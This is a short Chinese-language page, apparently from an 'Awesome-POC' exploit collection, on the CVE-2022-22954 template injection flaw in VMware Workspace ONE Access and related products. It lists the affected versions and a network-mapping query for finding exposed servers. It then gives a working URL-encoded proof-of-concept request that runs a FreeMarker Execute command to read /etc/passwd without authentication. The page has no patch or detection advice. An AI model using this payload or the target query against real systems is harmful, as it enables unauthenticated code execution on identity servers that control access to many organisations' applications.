Awesome-POC/中间件漏洞/VMware Workspace ONE Access SSTI漏洞 CVE-2022-22954.md
2024-11-06 14:10:36 +08:00

37 lines
1.1 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# VMware Workspace ONE Access SSTI漏洞 CVE-2022-22954
## 漏洞描述
VMware Workspace ONE Access以前称为VMware Identity Manager旨在通过多因素身份验证、条件访问和单点登录让您的员工更快地访问SaaS、Web和本机移动应用程序。其中的CVE-2022-22954是一个匿名服务器模板注入漏洞未经身份验证的攻击者可以利用此漏洞进行远程任意代码执行。
## 漏洞影响
```
VMware Workspace ONE Access Appliance 版本号20.10.0.0 20.10.0.1 21.08.0.0 21.08.0.1
VMware Identity Manager Appliance 版本号3.3.3 3.3.4 3.3.5 3.3.6
VMware Realize Automation 版本号7.6
```
## 网络测绘
```
app="vmware-Workspace-ONE-Access"
```
## 漏洞复现
登录页面
![image-20220524132528721](images/202205241325815.png)
验证POC
```
/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d
```
![image-20220524132657968](images/202205241326167.png)